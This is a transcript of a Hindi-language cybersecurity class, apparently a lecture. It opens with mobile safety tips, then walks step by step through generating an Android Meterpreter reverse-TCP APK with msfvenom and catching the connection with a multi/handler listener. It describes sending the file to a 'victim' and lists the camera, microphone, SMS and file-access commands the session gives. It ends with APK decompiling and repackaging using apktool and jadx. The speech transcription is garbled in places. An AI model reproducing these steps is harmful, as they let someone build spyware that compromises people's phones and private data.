थ्रू। तो अपनी लोकेशन, अपनी परमिशन हमेशा चेक करो कि कौन से एप्लीकेशन किस चीज की परमिशन मांग रही है, उसको जरूरत है या नहीं है। अगर एक बार स्टार्टिंग में एग्जीक्यूट करने के लिए, तो ऑथेंटिकेट करने के लिए एक बार परमिशन देनी भी पड़ती है। एक बार दो, तो उससे परमिशन एज सुन एज पॉसिबल वापस भी ले लो, राइट। ओके सर। सेकंड थिंग वाज डू नॉट कनेक्ट टू ओपन नेटवर्क्स। फ्री वाईफाई के चक्कर में कहीं भी कनेक्ट मत करना, सिंपल चीज। इंस्टॉल एप्लीकेशन फ्रॉम ट्रस्टेड सोर्स। ऐसा नहीं है कि पबजी खेलना ही खेलना है, उसका कोरियन वर्जन यूज कर रहे हो। कोरियन के चक्कर में कोई फेक एप्लीकेशन डाउनलोड मत कर लेना, क्योंकि आपका डाटा कॉम्प्रोमाइज कर दे इजीली, राइट। कि पबजी जो चल रहा है, उसके बैकग्राउंड पे कुछ और भी काम कर रही है आपकी एप्लीकेशन, ये भी पॉसिबिलिटीज हैं उसके अंदर, राइट। तो ऑलवेज इंस्टॉल एप्लीकेशन फ्रॉम ट्रस्टेड सोर्स। लाइक सिंपल प्ले स्टोर पे आपको ऑलमोस्ट ऑलमोस्ट हर एप्लीकेशन मिल जाती है। देन यू कैन यूज स्ट्रॉन्ग पासवर्ड,
अगर मैं बात करूँ मोबाइल के पिन की, हम अगर पिन डालते हैं स्क्रीन के ऊपर तो जनरली लोग 4 डिजिट पिन यूज करते हैं। कोई लिमिटेशन yes थोड़ी sir. है कि 4 डिजिट का पिन ही यूज करना है, मैं 7 का यूज करता हूँ। कोई हम्म. लिमिट नहीं है, कितना भी लंबा पिन यूज करो। Yes पासवर्ड्स sir. की जगह पास फ्रेजेस यूज करो, तो जितना हो उसके चीजों को कॉम्प्लेक्स रखो ताकि कोई इजीली उसको ब्रेक ना कर पाए सिक्योरिटी को। राइट। Okay. तो पिन्स की लेंथ 4 से बढ़ाओ, 7 रखो, 8 रखो, 10 रखो, बट ऐसा रखो जो आपको याद रहे और जो कि ब्रूट फोर्स करना डिफिकल्ट हो और जो कोई उसको इजीली गैस ना कर पाए, ऐसा भी हो। राइट। सो ऑलवेज यूज स्ट्रॉन्ग पासवर्ड और यू कैन यूज पास फ्रेजेस, देन ओके सर. यू सर कैन अगर यूज हम सम। हाँ। सर अगर हम पासवर्ड भूल जाए तो क्या करेंगे? पासवर्ड भूल जाओ तो या तो हार्ड रीसेट कर लो, या फिर उसमें रीसेट का ऑप्शन आता है कुछ मोबाइल्स में। उससे सर आप सब कुछ उड़ जाएगा फोन का? हाँ, तो और कोई इलाज नहीं है देख। मतलब पासवर्ड ऐसा रखो ना जो आपको याद रहे। ओके. एंड्रॉइड में एक ऑप्शन रहता है, आप उसको अनलॉक कर सकते हो, उसको थ्रू अपने मोबाइल को लॉक कर सकते हो। आप इनकेस पासवर्ड भूल भी जाते हो हम्म. तो एंड्रॉइड में एक ऑप्शन रहता है, आई थिंक, तो मुझे नहीं पता कि अभी ये काम करता है नहीं करता, पहले जरूर काम करता था ये ऑप्शन। तो अगर मैं कहीं पर लॉग इन करता हूँ, लेट मी जस्ट ओपन क्रोम, एक बार रिकॉर्डिंग स्टार्ट है। एमएसएफ रैंडम याद है? MSF Venom, यस सर. ओके। टर्मिनल। तो अगर आपको मेलवेयर बनाना है, फिर खुद का एक्सप्लॉइट बनाना हो एमएसएफ रैंडम के थ्रू, तो सेम ही तरीका है, सेम ही कमांड है। जस्ट स्टार्ट द कंसोल फर्स्ट, msfdb run to start my console and the database। ओके. मैंने यहाँ पे सिंपल सर्च किया एंड्रॉइड, मुझे यहाँ पे ओके. कुछ एक्सप्लॉइट्स दिख रहे हैं एंड्रॉइड के लिए और कुछ पेलोड्स भी दिख रहे हैं एंड्रॉइड के लिए। यस यू सर. कैन यूज सिंपल पेलोड्स लाइक दिस वन, ये पेलोड याद होगा, मेटाप्रेटर रिवर्स अंडरस्कोर टीसीपी, रिवर्स यस सर. अंडरस्कोर ये एचटीटीपी, जो भी आप यूज 26 पे करना टीसी. चाहो। ओके. 29 पे टीसीपी, 26 पे भी टीसीपी है। यस सर. राइट। तो यू कैन यूज एनी ऑफ दिस, आप ये एक्सप्लॉइट भी ट्राई कर सकते हो, बट पॉइंट इज आपका मोबाइल इनके लिए वल्नरेबल भी होना चाहिए। फॉर दैट पार्ट यू कैन यूज ऑक्सिलरी टू वेरीफाई कि आपका मोबाइल उस चीज के लिए वल्नरेबल है या नहीं है। ओके. और टू क्रिएट योर ओन malware, टू क्रिएट योर ओन exploit, यू कैन यूज दिस पेलोड्स। लेट्स स्टार्ट। मैंने सिंपली पेलोड कॉपी किया, एक न्यू टैब ओपन की, msf venom -p एंड exploit lhost, बिकॉज मुझे रिवर्स कनेक्शन चाहिए। मैंने यहाँ पे रिवर्स अंडरस्कोर टीसीपी लिया है। तो रिवर्स कनेक्शन में हम देते हैं हमारी खुद की आईपी फॉर रिवर्स कनेक्शन, यस सर. ifconfig, एंड दिस इज माय आईपी एड्रेस 1.1.1.4। मैंने आईपी एड्रेस यहाँ पे पेस्ट किया एंड और क्या देते हैं हम, एल होस्ट के बाद एल पोर्ट। हेल्प आउट. एल पोर्ट में मैंने दे दिया लेट्स गो विद 4444 ओके. एंड मोस्ट इंपोर्टेंट थिंग -f। एंड्रॉइड के केस में हम फॉर्मेट क्या देंगे यहाँ पे? APK. नहीं, एपीके आपका सपोर्टिव नहीं है। अगर यहाँ पे एपीके देता मुझे वो एरर देगा। लेट्स गो विद आउटपुट एंड्रॉइड हैक डॉट एपीके। ठीक है, मैंने एंटर प्रेस किया यहाँ पे सिंपल। आपके
APK यहाँ पे सपोर्टिव ही नहीं। फॉर दैट पार्ट व्हाट यू कैन डू इज रो फॉर्मेट्स याद है, हम जब भी किसी लैंग्वेज के लिए कोड बनाते हैं, लैंग्वेज के लिए पेलोड बनाते हैं, तो हम हाइफन रो एफ के साथ रो यूज करते हैं। आपके ओके पेलोड के अकॉर्डिंग अपने आप को कन्वर्ट कर देगा प्रॉपर फॉर्मेट के अंदर। ओके सर। सो यू हाइफन एफ के साथ रो यूज करना है आपको यहाँ पे, क्योंकि आपका APK या फिर एंड्रॉइड के लिए आपका कोई सपोर्टिव फ्रेमवर्क नहीं है यहाँ पे। तो यहाँ पे सिंपल एंटर प्रेस करो और ये आपका पेलोड बना के दे देगा आपको, एक्सप्लोड बना के दे देगा आपको। यस सर। सो मैं पे ls करता हूँ, तो आई हैव अ फाइल here android hack.apk, राइट। नाउ द पॉइंट इज ओके आपको ये सिंपल आपके विक्टिम तक भेजनी है जस्ट। तो उसके लिए लेट मी जस्ट, एक्सप्लॉइट्स थे इसके अंदर एंड्रॉइड वाले में हाँ कि वो सर डायरेक्ट चल जाएंगे हो सके तो? डिपेंड करता है, अगर वो आपकी, अगर आपका मोबाइल उसके लिए वल्नरेबल है तो वो चलेंगे, वरना वो नहीं चलेंगे। ओके उनका एक बार इंफॉर्मेशन पढ़ लेना शो इन्फो करके, जो किस आर्किटेक्चर पे चलते हैं, ये कंडीशंस क्या है चलने के लिए, कोई ओके एप्लीकेशन के सर। लिए है या फिर कर्नल के लिए है, किस चीज के लिए आपका एक्सपर्ट्स है वहाँ पे, ओके सर। राइट। मैंने अपना पेलोड बना लिया यहाँ पे MS Venom से। यस सर। सिंपल ये कमांड थी, मैंने पाइथन सर्वर स्टार्ट करके रखा है फॉर माई सर्वर एंड फॉर लिसनिंग और रिवर्स कनेक्शन मैंने यहाँ पे मल्टी हैंडलर यूज कर रहा हूँ। तो आई हैव टू स्पेसिफाई अ पेलोड हियर, यहाँ पे जिसको देते हैं सेट पेलोड, दैट वाज एंड्रॉइड मैटरप्रेटर एंड रिवर्स अंडरस्कोर TCP, राइट। मैंने यस किया सर। शो ऑप्शंस, मुझे एल होस्ट की वैल्यू सेट करनी है जस्ट, एल पोर्ट की वैल्यू ऑलरेडी सेट है 4444, तो मैंने पेलोड में सेम वैल्यू दी थी यहाँ पे। यस सर। तो सेट एल होस्ट 192.168.1.2 एंटर। इफ आई राइट शो ऑप्शंस, तो ऑल द रिक्वायर्ड फील्ड्स आर कॉन्फ़िगर्ड, और अब करते हैं रन। लिस्ट यहाँ पे स्टार्ट है। अब जैसे ही आपके जो विक्टिम था उसने फाइल को इंस्टॉल किया, आपको तुरंत यहाँ पे एक रिवर्स कनेक्शन मिल जाएगा। लेट्स स्टार्ट, लेट मी जस्ट इंस्टॉल दिस फाइल। एप्लीकेशन इंस्टॉल्ड, मैंने ओपन किया, और ओपन करते ही मुझे यहाँ पे कनेक्शन मिलेगा। मुझे परमिशंस मांग रहा है वो, में लोकेशन है, टेलीफोन है, SMS है, माइक्रोफोन है, कॉन्टैक्ट्स हैं, कैमरा है, स्टोरेज है, कॉल लॉग्स हैं। ये मुझसे ओके यहाँ पे अराउंड 9 परमिशंस, 8 परमिशंस मांग रहा है ये यहाँ पे। मैंने परमिशंस के लिए एक बार कंटिन्यू किया एंड अगर द मैटरप्रेटर है, राइट। अब मुझे नहीं पता ये कौन सी कमांड एग्जीक्यूट करनी है, तो सिंपल तरीका हेल्प टाइप कर लो एंड दीज आर द कमांड्स जो मोबाइल एप्लीकेशन के लिए सपोर्टिव है यहाँ पे। आप स्क्रीनशॉट ले सकते हो, ये कमांड चला सकते हो, तो कैमरा रिकॉर्ड कर सकते हो, वहाँ से फाइल्स फैच कर सकते हो, उसका माइक रिकॉर्ड कर सकते हो, वहाँ गाने बजा सकते हो, एंड ऑल द डिफरेंट थिंग्स। वी हैव मल्टीपल कमांड्स है। ओके SMS भेज सकते हो उसके थ्रू, मोबाइल नंबर के थ्रू, राइट। ओके तो वो ये ट्राई कर लेना, बिकॉज मैं अपने मोबाइल पे कुछ नहीं करने वाला अभी के लिए, बस decode and let me just drag and drop the file। मैंने प्रेस एंटर, मुझे यहाँ पे एक फोल्डर मिलेगा, इसके अंदर मेरे जावा का कोड और स्माली का कोड दोनों मिलेंगे मुझे यहाँ पे। मैंने एंटर प्रेस में इसको ओपन किया, मुझे यहाँ पे स्माली का कोड और एक्चुअल जावा का कोड दोनों मिलेंगे मुझे यहाँ पे, राइट। ओके सर। कुछ फाइल्स आपकी ऑलरेडी बाइनरीज में होंगी, वो आप देख नहीं पाओगे, बट कुछ फाइल्स का आप इजिली देख पाओगे। यू कैन गो विद स्माली कोड, एंड्रॉइड,
आपको एक्चुअल कोड कॉम में मिलेगा, ना कि एंड्रॉइड फोल्डर में। कॉम फोल्डर के अंदर जाना है, लेट्स गो विद पेंटेस्टर लैब एंड्रॉइड 1 एंड यू कैन सी ऑल द स्माइली कोड्स हियर, ओके सर। राइट? यू कैन रिवर्स इन योर एप्लीकेशंस एज वेल, उनका आपको सोर्स मिल जाएगा इजीली। सिंपल एपीके टूल बेस डीकोड, अगर डीकोड करना है तो अगर इसके कोड अंदर कोड मॉडिफाई करने के बाद आपको दोबारा एनकोड करनी है चीजें, देन यहाँ पे सिंपल डी हटा देना और सिंपल एपीके टूल डीकोड और फोल्डर का नाम देना है आपको यहाँ पे, ओके सर। राइट? तो आपके लिए प्रॉपर एक जिप फाइल बना देगा, एपीके फाइल जनरेट कर देगा और मॉडिफाइड कोड। और बाकी जेडेक्स तो सिंपल है ही, जेडेक्स -GUI ये ओपन करना है, फाइल के लिए ब्राउज करना है या फिर सिंपल ड्रैग एंड ड्रॉप कर लेना, ये सर। दोनों ही चीजें काम करती है वहाँ पे।